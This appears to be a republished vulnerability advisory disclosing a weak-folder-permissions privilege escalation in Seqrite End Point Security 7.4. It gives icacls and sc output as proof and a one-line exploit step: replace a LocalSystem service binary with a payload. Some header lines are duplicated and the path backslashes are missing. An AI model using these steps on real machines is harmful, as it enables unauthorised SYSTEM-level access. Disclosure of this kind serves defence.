Seqrite End Point Security 7.4 Privilege Escalation

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 337

# Exploit Title : Seqrite End Point Security v7.4 - Weak Folder Permissions Privilege Escalation
# Date : 09/13/2018
# Exploit Author : Hashim Jawad - @ihack4falaf # Exploit Title : Seqrite End Point Security v7.4 - Weak Folder Permissions Privilege Escalation
# Date : 09/13/2018
# Exploit Author : Hashim Jawad - @ihack4falafel
# Vendor Homepage : https://www.seqrite.com/
# Tested on : Windows 7 Enterprise SP1 (x64)

Description:
============
Seqrite End Point Security v7.4 installs by default to "C:Program FilesSeqriteSeqrite" with very weak folder permissions granting any user full permission "Everyone: (F)" to the contents of the directory and it's subfolders. In addition, the program installs handful of services with binaries within the program folder that run as "LocalSystem". Given the "Self Protection" feature (on by default) is disabled which can be done in number of ways (for instance, if the policy does not enforce EPS client password to change the settings any user can disable that feature), meaning a non-privileged user would be able to elevate privileges to "NT AUTHORITYSYSTEM".

Proof:
======
c:>icacls "c:Program FilesSeqriteSeqrite"
c:Program FilesSeqriteSeqrite Everyone:(OI)(IO)(F)
Everyone:(CI)(F)
NT SERVICETrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITYSYSTEM:(I)(F)
NT AUTHORITYSYSTEM:(I)(OI)(CI)(IO)(F)
BUILTINAdministrators:(I)(F)
BUILTINAdministrators:(I)(OI)(CI)(IO)(F)
BUILTINUsers:(I)(RX)
BUILTINUsers:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITYALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITYALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITYALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITYALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files

c:>sc qc "Core Mail Protection"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Core Mail Protection
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:Program FilesSeqriteSeqriteEMLPROXY.EXE"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Core Mail Protection
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

c:>icacls "C:Program FilesSeqriteSeqriteEMLPROXY.EXE"
C:Program FilesSeqriteSeqriteEMLPROXY.EXE Everyone:(I)(F)
NT AUTHORITYSYSTEM:(I)(F)
BUILTINAdministrators:(I)(F)
BUILTINUsers:(I)(RX)
APPLICATION PACKAGE AUTHORITYALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITYALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

c:>

Exploit:
========
Simply replace "EMLPROXY.EXE" with your preferred payload and wait for execution upon reboot.

# Disclosure Timeline:
# ====================
# 09-14-18: Contacted vendor, no response
# 09-21-18: Contacted vendor, no response
# 09-28-18: Vulnerability published